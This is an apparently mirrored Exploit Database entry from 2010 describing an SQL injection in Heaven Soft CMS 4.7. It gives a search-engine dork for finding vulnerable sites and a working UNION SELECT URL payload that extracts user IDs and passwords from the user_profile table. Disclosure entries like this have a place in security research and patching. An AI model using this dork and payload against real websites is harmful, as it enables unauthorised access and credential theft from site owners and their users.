Heaven Soft CMS 4.7 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： PrinceofHacking
  日期： 2010-05-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12599/

• ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  [x] Tybe: SQL Injection Vulnerabilities
  [x] Vendor: http://www.newyorkindoorcricket.com/
  [x] Script Name: Heaven Soft, CMS Version: 4.7
  [x] author: PrinceofHacking
  [x] Team: Ashiyane Digital Security Team
  [x] Mail : Prince[dot]H4ck@gmail[dot]com
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  D0rk:"photogallery_show.php?id"
  
  
  Exploit:
  
  http://localhost/photogallery_show.php?id=-1
  union+select+group_concat(user_id,0x3a,password),2+from+user_profile--
  
  [!]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~